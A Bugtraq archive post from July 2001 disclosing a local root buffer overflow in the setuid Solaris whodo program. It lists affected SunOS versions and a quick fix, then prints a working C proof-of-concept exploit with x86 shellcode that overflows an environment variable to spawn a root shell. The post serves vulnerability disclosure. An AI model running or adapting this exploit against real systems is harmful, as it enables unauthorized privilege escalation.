Bugtraq mailing list archives
Solaris whodo Vulnerability
From: Pablo Sor <psor () afip gov ar>
Date: Thu, 05 Jul 2001 10:55:55 -0400
Vulnerability in Solaris whodo Date Published: July 5, 2001 Advisory ID: N/A Bugtraq ID: 2935 CVE CAN: Non currently assigned. Title: Solaris whodo Buffer Overflow Vulnerability Class: Boundary Error Condition Remotely Exploitable: No Locally Exploitable: Yes Vulnerability Description: The whodo program is installed setuid root by default in Solaris. It contains a vulnerability in handling data from enviroment variables, if this variable exceeds predefined lenght an exploitable stack overflow can occur. Through exploiting this vulnerability an attacker can gain effective uid root. Vulnerable Packages/Systems: SunOS 5.8 SunOS 5.7 SunOS 5.5.1 (have not tested on other version) Solution/Vendor : Sun Microsystems was notified on June 28, 2001. Patches are excepted shortly. Quick Fix: Clear the suid bit of /usr/sbin/sparcv7/whodo (SunOS 5.8 Sparc) /usr/sbin/i86/whodo (SunOS 5.8, 5.7 Intel) /usr/sbin/whodo (SunOS 5.5.1) Credits: This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina. psor () afip gov ar, psor () ccc uba ar This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp () securityfocus com. Technical Description - Exploit/Concept Code: #include <fcntl.h> /* /usr/sbin/i86/whodo overflow proof of conecpt. Pablo Sor, Buenos Aires, Argentina 06/2001 psor () afip gov ar, psor () ccc uba ar works against x86 solaris 8 default offset +/- 100 should work. */ long get_esp() { __asm__("movl %esp,%eax"); } int main(int ac, char **av) { char shell[]= "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf" "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff" "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53" "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f" "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff"; unsigned long magic = get_esp() + 1180; /* default offset */ unsigned char buf[800]; char *env; env = (char *) malloc(400*sizeof(char)); memset(env,0x90,400); memcpy(env+160,shell,strlen(shell)); memcpy(env,"SOR=",4); buf[399]=0; putenv(env); memset(buf,0x41,800); memcpy(buf+271,&magic,4); memcpy(buf,"CFTIME=",7); buf[799]=0; putenv(buf); system("/usr/sbin/i86/whodo"); } -- Pablo Sor psor () afip gov ar, psor () ccc uba ar
Current thread:
- Solaris whodo Vulnerability Pablo Sor (Jul 05)
- Re: Solaris whodo Vulnerability Mike Gerdts (Jul 05)
- Re: Solaris whodo Vulnerability Pablo Sor (Jul 05)
- Re: Solaris whodo Vulnerability Dan Astoorian (Jul 06)
- Re: Solaris whodo Vulnerability Pablo Sor (Jul 06)
- Re: Solaris whodo Vulnerability Pablo Sor (Jul 05)
- Re: Solaris whodo Vulnerability Mike Gerdts (Jul 05)
- Re: Solaris whodo Vulnerability malachi (Jul 06)